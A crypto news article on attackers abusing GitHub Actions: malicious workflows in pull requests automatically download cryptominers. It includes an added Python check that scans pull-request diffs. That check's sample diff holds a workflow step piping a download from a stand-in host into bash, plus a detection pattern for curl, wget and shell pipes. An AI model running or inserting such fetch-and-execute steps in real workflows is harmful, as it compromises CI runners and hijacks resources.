GitHub's services are under investigation following a series of reports of attacks on its infrastructure that launch unauthorized cryptomining applications. Cybercriminals have reportedly exploited certain vulnerabilities that could be used to illicitly mine cryptocurrency.
Attacks Abuse GitHub Actions
According to The Record, Dutch security engineer Justin Perdok discovered the attacks on GitHub repositories. The attacks have taken place since November 2020, the report said.
Perdok noted that the series of attacks abused a GitHub feature called GitHub Actions, which lets users automatically run workflows and tasks when a specific event triggers them on their repositories.
To do this, threat actors use repositories that already contain GitHub Actions. The report details how the attack took place:
The attack consists of manipulating a legitimate repository, adding malicious GitHub Actions to the source code, and then submitting a pull request to the source repository to merge the code back into it.
However, the engineer explained that to run the malicious workflows, an attacker only needs to file the pull request. Once it is filed, GitHub's systems are tricked into reading the attacker's code and then automatically downloading the cryptomining software.
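A defender-side check for the pull-request pattern described above, as an added example that is not part of the original article: it scans a pull request's unified diff for changes under `.github/workflows/` and for added lines that fetch remote code. The sample diff, the `review_pr_diff` name and the fetch heuristic are assumptions constructed for illustration.

```python
import re

# Constructed sample: unified diff of a pull request from a fork (not real data).
SAMPLE_DIFF = """\
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,6 +1,7 @@
 on: [pull_request]
 jobs:
   build:
     runs-on: ubuntu-latest
     steps:
-      - run: make test
+      - run: |
+          curl -s https://example.invalid/payload.sh | bash
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1 @@
-old
+new
"""

WORKFLOW_PATH = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")
# Heuristic (assumption): added lines that download content or pipe it into a shell.
FETCH = re.compile(r"\b(curl|wget)\b|\|\s*(ba)?sh\b")
# GitHub author_association values treated as trusted here (policy assumption).
TRUSTED = {"OWNER", "MEMBER", "COLLABORATOR"}

def review_pr_diff(diff_text, author_association):
    """Return (path, reason) findings for workflow edits; empty list means nothing flagged."""
    findings, current = [], None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            # New-file header: track the file only if it is a workflow definition.
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
            current = path if WORKFLOW_PATH.match(path) else None
            if current and author_association not in TRUSTED:
                findings.append((current, "workflow file changed by outside contributor"))
        elif current and line.startswith("+") and FETCH.search(line):
            findings.append((current, "added step fetches remote code: " + line[1:].strip()))
    return findings
```

A non-empty result is a signal to hold the pull request's workflow run for manual approval rather than proof of abuse.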
100 crypto-mining applications used in a single attack
But the malicious campaign is proving more powerful than it seems, as Perdok told The Record that he has already discovered hackers using nearly 100 cryptocurrency mining apps, such as SRBMiner, in a single attack to mine multiple cryptocurrency variants.
However, the attack does not appear to pose a threat to the projects of the platform’s users.
GitHub has already responded to the issue, stating that it is aware of the problem and is actively looking into it. However, Perdok said GitHub gave him the same feedback last year when he reported the bug.
What do you think about this vulnerability in the GitHub infrastructure? Let us know your comments in the section below.
Disclaimer: This article is for information only. It is not a direct offer or invitation to buy or sell, nor is it a recommendation or endorsement of a product, service or company. Bitcoin.com does not provide investment, tax, legal, or accounting advice. Neither the company nor the author shall be liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any content, goods or services referred to in this article.